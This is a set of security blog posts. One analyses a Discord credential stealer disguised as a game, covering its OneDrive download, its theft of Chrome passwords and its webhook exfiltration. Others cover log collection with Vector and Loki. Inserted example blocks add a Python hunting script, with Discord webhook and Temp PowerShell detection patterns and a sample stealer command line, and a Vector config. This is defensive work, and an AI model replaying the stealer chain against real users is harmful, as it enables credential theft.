href="https://blogger.googleusercontent.com/img/a/AVvXsEghrHFQBKE7dZteO2R9LU9Ss83YOS3HyVKJnvIjgFFP9VMumT_tKImkGhWj6cK-d-7ZBiu8nn7O_tbaeZvPeM_GVJ_NrT39pc9xdeqxg5jHknX0HYKO0JQqU-ebCqBgsBqlSX3b037jJ_j5D0XlQmvshgSJ6elCZRMOOVEbOU3vodtveej5L99uWj_a" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="200" data-original-width="346" height="185" src="https://blogger.googleusercontent.com/img/a/AVvXsEghrHFQBKE7dZteO2R9LU9Ss83YOS3HyVKJnvIjgFFP9VMumT_tKImkGhWj6cK-d-7ZBiu8nn7O_tbaeZvPeM_GVJ_NrT39pc9xdeqxg5jHknX0HYKO0JQqU-ebCqBgsBqlSX3b037jJ_j5D0XlQmvshgSJ6elCZRMOOVEbOU3vodtveej5L99uWj_a" width="320" /></a></div><p>pdb string: C:\Users\runneradmin\AppData\Local\Temp\pkg.3d5278e5642d39a96bc8ed09\node\out\Release\node.pdb</p><p><br /></p><p>I started by analyzing the file locally but didn't get anywhere quickly so I moved to hatching triage for analysis.</p><p>Results: <a href="https://tria.ge/220220-wnqp3sbeh6">https://tria.ge/220220-wnqp3sbeh6</a></p><p><br /></p><p>Here's the process list:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjN0JDQvP0e0iCqxmA5ER4wu3CQZC6QQCjoJc5ZRR-cgD_2Fj_gGpo9sAosJVi_WLx53D_dh8OBo2qV5N7B3MfmA3UeLaA8IQ_Kw6RykF0Z4XE1wrzaOiCqOIUU8W_rHrFgj74B0ZxyOc1gCvvtjFP5cCbpcU8yslC74xvUF2kmjh3Qo62Gk5dKXy0z" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="874" data-original-width="710" src="https://blogger.googleusercontent.com/img/a/AVvXsEjN0JDQvP0e0iCqxmA5ER4wu3CQZC6QQCjoJc5ZRR-cgD_2Fj_gGpo9sAosJVi_WLx53D_dh8OBo2qV5N7B3MfmA3UeLaA8IQ_Kw6RykF0Z4XE1wrzaOiCqOIUU8W_rHrFgj74B0ZxyOc1gCvvtjFP5cCbpcU8yslC74xvUF2kmjh3Qo62Gk5dKXy0z=s16000" /></a></div><br />The executable drops and starts temp.ps1, which contains code to hide the window.<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEghbVPjcmbhkyYyZQTOpoxyG2KNVteNlOCXT-fH3OZFGstYztYYBi8XqjutuICHcOC611xMu7thNM1XxUfnNVPCSkrYx3M6OSE8yEGUcZTxEMNTTh-ks7jIMAMO4m5qkUYw-BIVfpN6UF9VksXeYgElkFchs0O3kpnIcpLwEegXYApm1lK2_fEJZPrg" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="179" data-original-width="488" height="234" src="https://blogger.googleusercontent.com/img/a/AVvXsEghbVPjcmbhkyYyZQTOpoxyG2KNVteNlOCXT-fH3OZFGstYztYYBi8XqjutuICHcOC611xMu7thNM1XxUfnNVPCSkrYx3M6OSE8yEGUcZTxEMNTTh-ks7jIMAMO4m5qkUYw-BIVfpN6UF9VksXeYgElkFchs0O3kpnIcpLwEegXYApm1lK2_fEJZPrg=w640-h234" width="640" /></a></div><br />Once the window is hidden, it seems to download and execute MachineMania.exe which is a python executable file made with pyinstaller. Argument provided to the machinemania.exe during executing is a discord webhook.<p></p><p>Looking through Triage and file access I see the following:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh1v20NI57ct06UtR1hLMCOFvsJ2K9ByTyF5F67MHfDFcz7kK6nMFXB6Lvdri4_wYQFcXFWNRWYzuJ8u-UL6UFFkIKS_QQsSVhEqzyXCGxMTCGDS2rsUZSjPHvmgCQfzLYdPtEK-rzfHp1RHj43cfLq2OWt-bn1ApQVciRIMkXa7paGGApyD20j1NcL" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="982" data-original-width="1043" src="https://blogger.googleusercontent.com/img/a/AVvXsEh1v20NI57ct06UtR1hLMCOFvsJ2K9ByTyF5F67MHfDFcz7kK6nMFXB6Lvdri4_wYQFcXFWNRWYzuJ8u-UL6UFFkIKS_QQsSVhEqzyXCGxMTCGDS2rsUZSjPHvmgCQfzLYdPtEK-rzfHp1RHj43cfLq2OWt-bn1ApQVciRIMkXa7paGGApyD20j1NcL=s16000" /></a></div><br />It appears to be looking for applications listed above but I'm not sure if it actually does anything if the apps are installed.<p></p><p><br /></p><p>Network traffic kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEiSeR2-MYFEmDkLrWMC300lydXuzcg57HRsfelRXrl-hY73wJ_CRV4f5CgnaxJ4bFomm8UVuBiNnqkLDgrla9tgsOq6Gj94AGvKm4SDEzSQuMuIiHI27wM6UebANmlbhMN-euh9E8I4W_q745Zo8kfuocoL5vhrRjksMtiQcTZ_oKwGqCyNGp4Z8zDS" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="197" data-original-width="501" height="158" src="https://blogger.googleusercontent.com/img/a/AVvXsEiSeR2-MYFEmDkLrWMC300lydXuzcg57HRsfelRXrl-hY73wJ_CRV4f5CgnaxJ4bFomm8UVuBiNnqkLDgrla9tgsOq6Gj94AGvKm4SDEzSQuMuIiHI27wM6UebANmlbhMN-euh9E8I4W_q745Zo8kfuocoL5vhrRjksMtiQcTZ_oKwGqCyNGp4Z8zDS=w400-h158" width="400" /></a></div><p></p><p>It looks like there is a connection to OneDrive. I was pretty sure that's where the MachineMania.exe was being downloaded from but I didn't see much in the pcap or Triage output.</p><p>I went back to debugger and found the exact OneDrive link in the memory which is hosting MachineMania.exe</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEigI5prRfadM5v87kRFHs4qqc-Tv_JfldXqeAJlpmoFYfBlt2Ogzt88DFCXBXgwTgipzYQ9W57_E9qEZa-G-1EP8Jnq-8NRuE1FSd5mS7Z5ONiHcqIiQN2aG7P6Z8A7p5uyixB5dIc643JM3g8YBXYQf5F9qG-OQjW2ZlYr6mR8Gyn1TYMbKr_wsToV" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="602" data-original-width="1089" src="https://blogger.googleusercontent.com/img/a/AVvXsEigI5prRfadM5v87kRFHs4qqc-Tv_JfldXqeAJlpmoFYfBlt2Ogzt88DFCXBXgwTgipzYQ9W57_E9qEZa-G-1EP8Jnq-8NRuE1FSd5mS7Z5ONiHcqIiQN2aG7P6Z8A7p5uyixB5dIc643JM3g8YBXYQf5F9qG-OQjW2ZlYr6mR8Gyn1TYMbKr_wsToV=s16000" /></a></div><br /><br /><p></p><p><b>Looking at MachineMania.exe:</b></p><p>Hash: 725918a6ae94e864908946ebb5e98dee</p><p>This is pyinstaller file. 
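As an added example (not code from the post or the sample), here is hunting logic for the chain described above, run over constructed Sysmon-style process events: a Discord webhook URL passed as a command-line argument, powershell.exe started with a .ps1 out of a Temp folder, and a PE whose PDB path says node.pdb while the file carries another name. The directories, the webhook id/token and the event layout are assumptions; only the file names and the PDB string come from the post.

```python
"""Hunting rules for the Discord stealer chain analysed in the post.

The events below are constructed, not real telemetry. Three behaviours
from the post are checked:
  1. a Discord webhook URL on a command line (MachineMania.exe argument)
  2. powershell.exe launched with a .ps1 from a Temp directory (temp.ps1)
  3. a PE whose PDB path ends in node.pdb but which is not named node.exe
"""
import re
from typing import Dict, List

# Discord webhook URL as seen on a command line (discord.com or the older
# discordapp.com host). Assumed pattern; the id/token parts are wildcards.
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+",
    re.IGNORECASE,
)
# A .ps1 path that has a "\Temp\" component somewhere before the script name.
TEMP_PS1_RE = re.compile(r"\\temp\\[^\s\"']*\.ps1\b", re.IGNORECASE)
# Tail of the PDB path from the post (a node.exe build).
NODE_PDB_SUFFIX = r"\node\out\Release\node.pdb"


def check_process_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules a process-creation event matches."""
    hits: List[str] = []
    cmd = ev.get("CommandLine", "")
    exe = ev.get("Image", "").rsplit("\\", 1)[-1].lower()

    if DISCORD_WEBHOOK_RE.search(cmd):
        hits.append("discord_webhook_on_cmdline")

    if exe in ("powershell.exe", "pwsh.exe") and TEMP_PS1_RE.search(cmd):
        hits.append("powershell_script_from_temp")

    return hits


def check_pdb_path(file_name: str, pdb_path: str) -> bool:
    """True when the PDB path identifies a node.exe build but the file on
    disk is named something else, as with the renamed node binary in the post."""
    return (pdb_path.lower().endswith(NODE_PDB_SUFFIX.lower())
            and file_name.lower() != "node.exe")


# Constructed sample events. Paths are invented; the webhook is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\victim\Downloads\Fruit_of_the_ace_v3.11.99.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\victim\Downloads\Fruit_of_the_ace_v3.11.99.exe"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\victim\Downloads\Fruit_of_the_ace_v3.11.99.exe",
     "CommandLine": r"powershell.exe -File C:\Users\victim\AppData\Local\Temp\temp.ps1"},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\MachineMania.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MachineMania.exe https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN"},
    # Benign admin script outside Temp: must not fire.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious command line to the rules it triggered; clean events are dropped."""
    results: Dict[str, List[str]] = {}
    for ev in events:
        hits = check_process_event(ev)
        if hits:
            results[ev["CommandLine"]] = hits
    return results


if __name__ == "__main__":
    for cmdline, rules in hunt(SAMPLE_EVENTS).items():
        print(rules, "<-", cmdline)
    pdb = (r"C:\Users\runneradmin\AppData\Local\Temp"
           r"\pkg.3d5278e5642d39a96bc8ed09\node\out\Release\node.pdb")
    print("renamed node binary:", check_pdb_path("Fruit_of_the_ace_v3.11.99.exe", pdb))
```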
</p><p>I analyzed that file in Triage but I replaced discord webhook with webhook.site webhook</p><p><a href="https://tria.ge/220220-ycs26scgdr/behavioral1">https://tria.ge/220220-ycs26scgdr/behavioral1</a></p><p>File interaction looks a bit different in analysis of this file. Unlike the original file, this file only looks at Chrome folder.</p><p></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgGUWsfH4ZmQbmhnxRmfBbBDwXvYTKrUUB0uaN8yXcibGHhtlvdvWQWzcpNAunEDVEH7G9GdAeDf1omMGFaMDYJWdaSTPqOY-uAXbQw5-Wq4HekmRf7fB8ILUDyF6bL8MJMp1TTX8nsZG7w9VbkNgNec2WfnIym-K7b46CAvGh-m3PP1GvWoV3T0siv" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="993" data-original-width="971" src="https://blogger.googleusercontent.com/img/a/AVvXsEgGUWsfH4ZmQbmhnxRmfBbBDwXvYTKrUUB0uaN8yXcibGHhtlvdvWQWzcpNAunEDVEH7G9GdAeDf1omMGFaMDYJWdaSTPqOY-uAXbQw5-Wq4HekmRf7fB8ILUDyF6bL8MJMp1TTX8nsZG7w9VbkNgNec2WfnIym-K7b46CAvGh-m3PP1GvWoV3T0siv=s16000" /></a></div><br />The webhook requests look kinda like this:<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMaeYH1etJUbei7zqmqGqWx8jQ_mQz-3mn7YbknLWarAMYN_HmR3THDM9aB_qR2d2cuAvqLw9KabKWfWYndTpEtEY7O2SiBnJPcq0KzSSaKnFWMgJWzy3zbmDPWuX41VCg4BQgGZi-wNRnuq0Ws9104r8FXeOiC9wV9fJBQ2mCBXSzCZdww5E9k9yo" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="359" data-original-width="879" height="261" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMaeYH1etJUbei7zqmqGqWx8jQ_mQz-3mn7YbknLWarAMYN_HmR3THDM9aB_qR2d2cuAvqLw9KabKWfWYndTpEtEY7O2SiBnJPcq0KzSSaKnFWMgJWzy3zbmDPWuX41VCg4BQgGZi-wNRnuq0Ws9104r8FXeOiC9wV9fJBQ2mCBXSzCZdww5E9k9yo=w640-h261" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEgRp0de9WD3TF2XXDykETSTHuPjmcNwVyInzj2xHb5rKHfaZnT3UNZW4w-3oktJZ5fpSRkFCvrBMGG_vlyMY9curzjj8eJbMtMILUk9NLzP-G82SkECwLZbsyAyxwkc-EvCBKRSFuB02CyPzUciBhuW26W_ALXSdiPzyjYqUMKZzQ-eJ_Z_05xR1g-Q" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="446" data-original-width="968" height="294" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRp0de9WD3TF2XXDykETSTHuPjmcNwVyInzj2xHb5rKHfaZnT3UNZW4w-3oktJZ5fpSRkFCvrBMGG_vlyMY9curzjj8eJbMtMILUk9NLzP-G82SkECwLZbsyAyxwkc-EvCBKRSFuB02CyPzUciBhuW26W_ALXSdiPzyjYqUMKZzQ-eJ_Z_05xR1g-Q=w640-h294" width="640" /></a></div><br />It appears to be only looking at Chrome. <p></p><p><br /></p><p>To further analyze the file, I started to decompile the pyinstaller file to see what it has inside of it.</p><p>I used this to extract the files: <a href="https://github.com/extremecoders-re/pyinstxtractor">https://github.com/extremecoders-re/pyinstxtractor</a></p><p>I found the following files to be interesting</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjvMAaL0uyIJHljvkcl_dNxCJa0uZHQRO-y81V_1ftsZxD4JgWyb2bDkTZX9Mw3MwS60px0zG__OWdloZ7vk_VAvEVwjqm3MjZ1VYn6zA2I2FVZBF5PE_ieBiPXqgCTU5CPhLj5JuZL8qrETCLS-jKeko3O2k80gW1WM2tHaeU5G6jeKgdb0FSCyWuo" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="137" data-original-width="615" height="142" src="https://blogger.googleusercontent.com/img/a/AVvXsEjvMAaL0uyIJHljvkcl_dNxCJa0uZHQRO-y81V_1ftsZxD4JgWyb2bDkTZX9Mw3MwS60px0zG__OWdloZ7vk_VAvEVwjqm3MjZ1VYn6zA2I2FVZBF5PE_ieBiPXqgCTU5CPhLj5JuZL8qrETCLS-jKeko3O2k80gW1WM2tHaeU5G6jeKgdb0FSCyWuo=w640-h142" width="640" /></a></div><br />discordwebhook content looks like it's just doing POST request.<p></p><p>I wasn't able to get anything out of chrome.pyc file but it appears to be backed with pyarmor.</p><p><br /></p><p>Additionally, while doing some analysis of the original file in 
debugger I also saw this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJRjYUunNbr3vKaGWC0SYD2yEMDIqNWAUYbQCMsKukshTBDUAk6ZULTaaB8LhkS5qYrKutEV_72e0JjDCh1lMcNElTtDVpA-RVqBNyKF7AwvIl_oIRFI_UxK-H2M6QfG_4tcKbgLYffuHFJagvxSHLiFlq6yyHFJGcsLoHDXgHAKPo8e6Joxep48BJ" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="829" data-original-width="1097" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJRjYUunNbr3vKaGWC0SYD2yEMDIqNWAUYbQCMsKukshTBDUAk6ZULTaaB8LhkS5qYrKutEV_72e0JjDCh1lMcNElTtDVpA-RVqBNyKF7AwvIl_oIRFI_UxK-H2M6QfG_4tcKbgLYffuHFJagvxSHLiFlq6yyHFJGcsLoHDXgHAKPo8e6Joxep48BJ=s16000" /></a></div><br /><br /><p></p><p>I'm not really sure about what other capabilities the original file has. There is probably more but I mostly looked at the dropped pyinstaller/machinemania.exe file. I'm not sure about how nodejs code can be packed as executable.</p><p><br /></p><p><b>Conclusion</b></p><p>Based on limited and quick analysis, it looks like compromised account will share the exe file.</p><p>original exe file will download and execute file from onedrive</p><p>onedrive file will steal data and send it to discord via webhook.</p><p>to me, the onedrive file only seems to be stealing chrome saved passwords and nothing else.</p><p><br /></p><p>Similar sample: <a href="https://twitter.com/GlitchyPSI/status/1439674473515569154">https://twitter.com/GlitchyPSI/status/1439674473515569154</a></p><p><a href="https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations">https://www.virustotal.com/gui/file/60e75541c4b4130151fb2b80f04cd699ba0e66bf6c4ec364127e93a38dccefa9/relations</a></p><p>Check the Execution Parents. 
There are a lot of node binaries and filenames usually look like names of games.</p><p></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-3854135927461275532021-12-12T20:00:00.000-08:002021-12-12T20:00:01.581-08:00notes/links about log collection, storage, and searching<p><b>Introduction</b></p><p>Just some notes about log collection, storage, and searching.</p><p>I just want to be able to store some log data for a long time and do searches on it later in the future, once in a while. I'm not trying to produce a report with the data or do alerting or transport the logs securely.</p><p>One of my use cases is collecting network data and storing that for a long time and maybe searching for a specific domain or IP in the future that could've been related to a security incident. </p><p>Similar for incoming http traffic. I'd like to see if someone tried to access a specific URI a really long time ago. (maybe when vuln related to that URI wasn't public at the time)</p><p>(leaving out elasticsearch-based things, splunk, and cloud-based services)</p><p>notes/links should help w/ research if anyone else is trying to do the same thing as me</p><p><br /></p><p><b>Gathering & shipping logs:</b></p><p>For Windows Event Logs:</p><p>- fluentbit - <a href="https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log">https://docs.fluentbit.io/manual/pipeline/inputs/windows-event-log</a></p><p>- fluentd - <a href="https://docs.fluentd.org/input/windows_eventlog">https://docs.fluentd.org/input/windows_eventlog</a></p><p>- nxlog - <a href="https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog">https://nxlog.co/docs/nxlog-ce/nxlog-reference-manual.html#im_msvistalog</a></p><p>- winlogbeat - <a href="https://www.elastic.co/downloads/beats/winlogbeat-oss">https://www.elastic.co/downloads/beats/winlogbeat-oss</a></p><p>- promtail - <a 
href="https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log">https://grafana.com/docs/loki/latest/clients/promtail/scraping/#windows-event-log</a></p><p><br /></p><p>- Windows event forwarding - https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection - WEF sends logs from all the hosts to one collector host</p><p>For other text-file-based logs (linux, webapp, etc..)</p><p>- all the tools above</p><p>- vector - <a href="https://vector.dev/components/">https://vector.dev/components/</a></p><p>- filebeat - <a href="https://www.elastic.co/downloads/beats/filebeat-oss">https://www.elastic.co/downloads/beats/filebeat-oss</a></p><p>- rsyslog - <a href="https://www.rsyslog.com/">https://www.rsyslog.com/</a></p><p>- syslog-ng - <a href="https://www.syslog-ng.com/products/open-source-log-management/">https://www.syslog-ng.com/products/open-source-log-management/</a></p><p>- logstash - <a href="https://www.elastic.co/downloads/logstash-oss">https://www.elastic.co/downloads/logstash-oss</a></p><p><br /></p><p>Some of the tools listed above can take in forwarded events (syslog, logstash/beats, etc) from other products and tools as well. 
</p><p><br /></p><p>- kafka - <a href="https://kafka.apache.org/">https://kafka.apache.org/</a> another option for just getting logs from various sources and forwarding them to some other place</p><p><br /></p><p>input/output, sources/sinks:</p><p>- kafka - <a href="https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem">https://cwiki.apache.org/confluence/display/KAFKA/Ecosystem</a></p><p>- vector - <a href="https://vector.dev/components/">https://vector.dev/components/</a></p><p>- fluentbit - <a href="https://docs.fluentbit.io/manual/pipeline/inputs">https://docs.fluentbit.io/manual/pipeline/inputs</a> </p><p><a href="https://docs.fluentbit.io/manual/pipeline/outputs">https://docs.fluentbit.io/manual/pipeline/outputs</a></p><p>- fluentd - <a href="https://docs.fluentd.org/input">https://docs.fluentd.org/input</a></p><p><a href="https://docs.fluentd.org/output">https://docs.fluentd.org/output</a></p><p>- logstash - <a href="https://www.elastic.co/guide/en/logstash/current/input-plugins.html">https://www.elastic.co/guide/en/logstash/current/input-plugins.html</a></p><p><a href="https://www.elastic.co/guide/en/logstash/current/output-plugins.html">https://www.elastic.co/guide/en/logstash/current/output-plugins.html</a></p><p>- rsyslog - <a href="https://www.rsyslog.com/plugins/">https://www.rsyslog.com/plugins/</a></p><p><br /></p><p><b>Log processing:</b></p><p>You may want to process the data to drop certain events or append data to some events. For example, for network data, you may want to use a filter that adds geoip info. You may also want to rename fields.</p><p>Many of the collectors and shippers listed above already have some ability to modify or parse the log data. </p><p>Some of the tools call these plugins/modules filters, processors, or transformers. 
You may also be able to write your own plugins or some code (some tools above support Lua) to change the logs before the output step happens.</p><p>Depending on the type of processing you may want to do, you may need to output the logs into a different format that your application understands, then process it and put it back into the pipeline for the next step or storage.</p><p>For kafka, I found faust (<a href="https://faust.readthedocs.io/en/latest/">https://faust.readthedocs.io/en/latest/</a>) but there are other libraries too for python and other langs.</p><p><b><br /></b></p><p><b>Log storage:</b></p><p>The output part in almost all the tools listed above can send data to various places where logs can be indexed and/or stored. </p><p>You can always store logs to disk on one host w/ compression (obviously searching this is not very fun). Files can also be stored in the cloud. Everything pretty much has s3 output support.</p><p>For files stored on disk, many of the tools will allow you to select a format such as text, json, etc..</p><p>Tools such as logrotate can be used to move, compress, or delete the logs (<a href="https://linux.die.net/man/8/logrotate">https://linux.die.net/man/8/logrotate</a>)</p><p>cron jobs/scheduled tasks and some scripts can always be used to move, compress, or delete files as well. </p><p>For being able to easily store and search logs, there is Grafana Loki - <a href="https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html">https://www.boredhackerblog.info/2021/11/collecting-unifi-logs-with-vector-and.html</a></p><p>Grafana Loki is somewhat similar to elasticsearch or splunk and you can use the Grafana webui to query the data.</p><p>While doing more research, I came across clickhouse (which is also supported by some of the tools above) (<a href="https://clickhouse.com/">https://clickhouse.com/</a>). Clickhouse can store json data and you can run sql queries on that data. 
</p><p>I also came across cloki, which is using clickhouse but emulating loki (<a href="https://github.com/lmangani/cloki">https://github.com/lmangani/cloki</a>)</p><p>The backend is a clickhouse database and you push logs into loki emulator, just like you'd push logs into loki. cloki also supports the same query language as loki and will work with grafana loki connector.</p><p><br /></p><p><b>Log search:</b></p><p>Searching the logs depends on how they're stored obviously. For uncompressed or compressed logs, tools such as grep or zgrep or ripgrep (https://github.com/BurntSushi/ripgrep) can be used for searching.</p><p>On Windows, there are a few tools that can be used to search and/or query logs. Fileseek (<a href="https://www.fileseek.ca/">https://www.fileseek.ca/</a>) can be used to search a bunch of files. There is Logfusion (<a href="https://www.logfusion.ca/">https://www.logfusion.ca/</a>) as well which can be used to read log files.</p><p>There is also Log Parser Lizard (<a href="https://lizard-labs.com/log_parser_lizard.aspx">https://lizard-labs.com/log_parser_lizard.aspx</a>) which can be used to query log files and even save queries and produce charts or reports.</p><p>Files can also be loaded into python w/ pandas for searches, complex searches, or statistical analysis. Pandas supports loading various file types. (<a href="https://pandas.pydata.org/docs/reference/io.html">https://pandas.pydata.org/docs/reference/io.html</a>)</p><p>Finally, if you end up using loki or cloki, grafana can be used to do queries. Grafana also has connectors/plugins for other database/log storage systems. 
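As an added example, not the author's config or gist, here is a Vector config that wires together the gather/process/store steps from these notes: a syslog source, a filter transform that drops noise, a remap transform that renames a field, and a Loki sink. The UDP port 1514 and labels.system = "unifi" follow the Unifi/Loki post linked above; the endpoint, the field names and the filter condition are assumptions.

```toml
# Added example of a Vector pipeline (not from the post's gist).
# source -> transforms -> sink, as the "Log processing" notes describe.

# Gather: listen for syslog over UDP on an unprivileged port.
[sources.unifi_syslog]
type = "syslog"
mode = "udp"
address = "0.0.0.0:1514"

# Process, step 1: drop events you never want to store.
# Assumed condition; "severity" is the field the syslog source sets.
[transforms.drop_debug]
type = "filter"
inputs = ["unifi_syslog"]
condition = '.severity != "debug"'

# Process, step 2: rename a field and append a fixed tag.
[transforms.tag_unifi]
type = "remap"
inputs = ["drop_debug"]
source = '''
# move the syslog hostname to a clearer name and tag the event source
.device = del(.hostname)
.log_source = "unifi"
'''

# Store: push to Loki. A label is required; the values are up to you.
[sinks.loki]
type = "loki"
inputs = ["tag_unifi"]
endpoint = "http://localhost:3100"   # assumed: Loki on the same host
encoding.codec = "json"
labels.system = "unifi"
labels.device = "{{ device }}"       # label from the renamed field
# Loki is unauthenticated by default; basic auth is available if you front
# it with something that checks credentials (optional, assumed values):
# auth.strategy = "basic"
# auth.user = "vector"
# auth.password = "CHANGE_ME"
```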
</p><p><br /></p><p><b>Sample logs:</b></p><p>To play with any of the tools above without making changes in production env, you can use sample logs or data sources.</p><p><a href="https://github.com/logpai/loghub">https://github.com/logpai/loghub</a> - github repo that links to several sample logs</p><p><a href="https://www.secrepo.com/">https://www.secrepo.com/</a> - logs related to security. there are some network traffic logs in there</p><p><a href="https://www.sec.gov/dera/data/edgar-log-file-data-set.html">https://www.sec.gov/dera/data/edgar-log-file-data-set.html</a> - EDGAR log files</p><p><a href="https://log-sharing.dreamhosters.com/">https://log-sharing.dreamhosters.com/</a> - various log files</p><p><a href="https://www.logs.to/">https://www.logs.to/</a> - log generator (various types)</p><p><a href="https://github.com/mingrammer/flog">https://github.com/mingrammer/flog</a> - log generator</p><p><a href="https://certstream.calidog.io/">https://certstream.calidog.io/</a> - certificate transparency logs</p><p><a href="http://www.hivemq.com/demos/websocket-client/">http://www.hivemq.com/demos/websocket-client/</a> / broker.mqttdashboard.com - If you want to grab MQTT demo data. I'm pretty sure people are using this for free for their projects too...</p><p><br /></p><p><br /></p><p>ps: i'm not an engineer or an observability expert. Implementation of various tools above varies and may have impact on resource usage.</p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-78293301128326054212021-11-26T15:53:00.000-08:002021-11-26T15:53:01.699-08:00Collecting Unifi logs with Vector and Grafana Loki<h2 style="text-align: left;"><b>Introduction</b></h2><p>This post just discusses sending unifi logs to grafana loki and utilizing vector.dev/vector agent.</p><p>Typically for log collection I would utilize something like Beats (filebeat, winlogbeat) and Logstash. 
Logstash unfortunately, in my experience, uses too much memory and CPU resources so I decided to search for an alternative. I came across vector.dev, fluentd, and fluentbit. Vector.dev seemed to be easy to install, configure, and use so I decided to give that a try. </p><p>For log storage and search, I would normally use Elasticsearch & Kibana, Opensearch, Graylog, or Humio. Humio would be hosted in the cloud and anything that's Elasticsearch or Elasticsearch-based would also require too much memory and CPU resources. I found Grafana Loki and decided to try that. It seems relatively lightweight for my needs and runs locally. Also I saw a Techno Tim video on Loki recently.</p><p>Logs will be stored with Loki and I'll use Grafana to connect to Loki and use it to query and display the data.</p><p>Vector and Grafana Loki will be running on a NUC w/ Celeron CPU w/ 4GB RAM so having something that runs on Pi (grafana has an article where they run grafana loki on a pi) is nice.</p><h2 style="text-align: left;"><b>Design</b></h2><p>Unifi controller has an option to send logs to a remote system so that's what I'll be using to send logs. It will send syslog (udp) to an IP address. </p><p>Vector has sources, transforms, and sinks. Source is input/data source, transforms can apply various operations to the data, such as filtering or renaming fields, and sink is basically the output. I will be just using source and sink. Source in this case will be syslog. Vector will listen on a port for syslog messages. 
Sink will be Loki since that's where the logs will be stored.</p><p>I'll have one VM running vector and the same VM will be running Grafana UI and Loki using docker-compose.</p><p>Unifi Controller Syslog -> (syslog source) Vector (Loki sink) -> Loki <- Grafana WebUI</p><p>I am not using any encryption in transit or authentication for loki, but it is an option.</p><h2 style="text-align: left;"><b>Setup</b></h2><p>I have an Ubuntu 20.04 server w/ docker and docker-compose installed.</p><h3 style="text-align: left;"><b>Grafana Loki</b></h3><p>Grafana docker tutorial shows how to set up grafana loki with docker-compose: https://grafana.com/docs/loki/latest/installation/docker/ </p><p>I removed the promtail container from my configuration.</p><p>Here's the configuration I'm using:</p><p><a href="https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260" target="_blank">https://gist.github.com/BoredHackerBlog/de8294818027d450ecc2aed9c94c5260</a></p><p>Create a new loki folder and grafana folder, which docker will mount.</p><p>Download https://raw.githubusercontent.com/grafana/loki/v2.4.1/cmd/loki/loki-local-config.yaml and place it in the loki folder and rename the file to local-config.yaml. Change the configuration if needed.</p><p>No need to download and place anything in the grafana folder.</p><p>Run docker-compose up -d to start grafana and loki.</p><p>Grafana webui is running on port 3000 and default creds are admin/admin.</p><p>Go to configuration and add loki as the data source. 
